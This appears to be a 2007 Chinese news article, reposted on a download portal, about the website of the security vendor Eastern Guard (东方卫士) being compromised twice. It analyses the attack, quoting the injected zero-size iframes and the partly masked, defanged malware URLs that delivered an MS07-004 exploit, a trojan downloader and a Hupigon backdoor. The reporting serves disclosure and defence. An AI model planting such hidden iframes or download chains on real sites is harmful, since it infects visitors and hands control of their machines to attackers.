文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络网络技术东方卫士被挂马 安全网站安全谁来保证
精品推荐
特别推荐
·精彩全记录 100个最佳的Linux站点推荐
·修改注册表增强系统抵抗DDOS攻击的能力
·新手轻轻松松做网管必须掌握的步骤
·ADSL路由方式的NAT(端口映射)
·保护系统 彻底清除Infostealer.Gampass病毒
·网管高招另类方法解决离奇断网故障二例
·Windows2000 下管理员账户真的不安全
·Windows下权限设置详解
热点TOP10
·网易免费主页空间&域名系统漏洞简介
·黑客目标开始转向谋取金钱 攻击手段越来越高明
·丢弃鼠标 Windows常用五组快捷键
·U盘病毒AutoRun.inf和Ravmon.exe的清除
·高二学生攻破2000多个网站后被捕
·高手必读 网络端口的安全防护技巧放送
·安全常识:Windows XP需禁止的十大服务
·菜鸟勿试 最新四个木马测试你的杀毒软件

东方卫士被挂马 安全网站安全谁来保证

日期:2007年7月6日 作者: 查看:[大字体 中字体 小字体]

【原创版权独家所有,如欲转载,请注明出处“赛迪网”和文章作者“T木”!违者,赛迪网将保留追究其法律责任的权利!】

【编者按:为安全起见,文中“http”均被替换为“hxxp”,“<>”均被替换为“[]”,特此说明。】

前两天有网友反映国内知名的安全网站东方卫士再次被挂载木马,这已经是东方卫士第二次暴露出存在安全隐患。

回顾

在此之前就曾发生过一次东方卫士网站首页(hxxp://www.i110.com)存在恶意代码引用的事件,如果用户没有安装过微软的MS07-004补丁程序,并且使用IE浏览器访问上述页面的话,就会感染木马病毒。

技术分析:

1. 东方卫士网站首页代码中,包含了一处对恶意网页的引用语句:

[iframe src=hxxp://***.ch/ook.html width=0 height=0][/iframe]

如图1:

东方卫士被挂马 安全网站安全谁来保证

图1

2.这个被引用的恶意网页中包含了利用MS07-004漏洞的代码,使得系统能够自动下载hxxp://***.ch/xia.exe(Trojan-Downloader.Win32.agent.ddz)到本地,并运行。

3.xia.exe是个木马下载器,该木马复制自身到%system32%目录下,命名为wdfmg1r32.exe,运行后下载灰鸽子病毒hxxp://***.li/2.exe(Backdoor.Win32.Hupigon.cpb)。

4.2.exe是灰鸽子病毒最新变种,采用RootKit技术编写,隐藏进程。它复制自身到%system32%目录下,命名为system32.exe,该病毒运行后会释放文件到 %WinDir%\svchost.exe,文件大小为381440字节,并创建下面服务:

服务名:Net work nois
服务描述:Net work nois
服务程序:C:\WINNT\svchost.exe

另外还会下载hxxp://lxn2wyf8899.3322.org/ip.txt到本地系统临时目录下。ip.txt包含的内容为:

hxxp://221.215.170.192:5600/wwwroot/(该IP对应地址为:山东省青岛市(李
沧区)网通ADSL)

染毒电脑将被黑客远程完全控制,这些操作可能是任意文件操作、注册表操作、键盘记录、下载执行远程程序、任意网络操作甚至远程开机摄像头监控等。

再次被挂马

而这一次,在东方卫士主页上,通过查看页面源代码,可以看到网页中被插入一条“[ iframe src=”指令,该指令将隐藏打开一个新的页面,这个页面伪造了浏览器无法开的错误网页,并在后台隐藏打开三个页面,进行木马下载。

打开的隐藏页面代码:

[iframe src=hxxp://www.****.cn/33/Reflector/index.htm width=0 
height=0 frameborder=0][/iframe]

在打开的伪造错误页面中会打开三个网页:

[iframe src="hxxp://www.****.cn/33/Reflector/4.htm" width="0" 
height="0" frameborder="0"][/iframe]
[iframe src="hxxp://www.****.cn/33/Reflector/2.htm" width="0" height="0" frameborder="0"]
[/iframe]
[iframe src="hxxp://www.*****.com/wm/20/5.htm" width="0" height="0" frameborder="0"]
[/iframe]

下载木马:

hxxp://www.****.cn/33/Reflector/1.exe(无效)
hxxp://www.*****.com/0.exe

东方卫士被挂马 安全网站安全谁来保证

图2

东方卫士被挂马 安全网站安全谁来保证

图3

再一却又再二,是否还会再三再四

我们常说“再一再二,不可再三再四”。作为防护先锋的安全网站,其在用户心目中的可信度、影响度都是极高的,他们任何一次疏忽所带来的危害性都远大于木马病毒自身所造成的破坏。第一次发生网站被挂载木马的事件后,相信东方卫士应该已经采取了相应的措施。但挂马事件却能够再次发生,这就需要引起我们的警惕与反思了。

再次挂马,说明在“矛”与“盾”的斗争中,“矛”又一次的占据了上风。同时,东方卫士网站一而的再被挂马,除了系统自身依然存在尚未发现的漏洞外,其在自身网站的安全监控上也应当还存在着一定的、可被利用的缺陷。

在以前的文章中我们曾提到CNN由于未能及时更新它的防毒软件,遭到了一种“本可以被及时检测到”蠕虫病毒的攻击。“矛”与“盾”永远都是并存的,不可能出现某一个完全盖过另一个的情况,只能是或者二者并存、或者二者同消失。也就是说,二次挂马事件的出现,除了是因为出现了新的“矛”,更是因为“盾”的上面再一次出现了漏洞,给了“矛”以可乘之机。

有则改之,出现了问题并不可怕,怕的是不知道这个问题是如何出现的,怕的是我们不知道如何去防范、避免问题的再次出现。

安全网站它代表的不仅仅是一个公司、一个集团,它更是网络安全斗争的最前沿。当它连自身的安全都无法保证时,又让普通用户去如何面对日趋危险的网络世界,又让普通用户去如何知道除了自己还有谁能来帮助他抵御网络威胁的入侵。

当安全网站也被击倒了,我们还能信任谁!安全网站的安全谁来保证?

相关资料

MS07-004漏洞:是Microsoft公司多个版本的操作系统对矢量标记语言(VML)的支持存在整数溢出,导致可以执行任意指令,使的远程攻击者可以利用此漏洞控制用户机器。

东方卫士:交大铭泰信息安全公司,国内知名信息安全厂商,该公司提供《东方卫士》系列防病毒产品、数据保护、无毒网关产品、防垃圾邮件产品、网络设备及系统集成和 OEM 定制服务。





上一篇:网络攻击常用的命令(都是经典的)

下一篇:实例为你解说FrontPageServer溢出攻击
相关文章:
·98个经典国外B2B网站
·手机里舍不得删除的48条搞笑短信(保证你没看过)
·中国十大免费电影网站排行
·巧用宽带路由器建立个人网站
·网络安全专家变身黑客 年入百万元以上
·28个免费在线电影网站
·光盘卫士 V1.8算法分析
相关软件:
·优秀企业网站系统软件源码免费版V2009
·自己动手建立企业网站
·东方影都2003 最新版
·公司企业网站管理系统模板功能强大版
·闪魂——Flash网站建设实录
·保证你快速致富的七个步骤
·东方网页王III 正式版

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.viphot.com
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.viphot.com All Rights Reserved. 鄂ICP备05000083号Powered by:viphot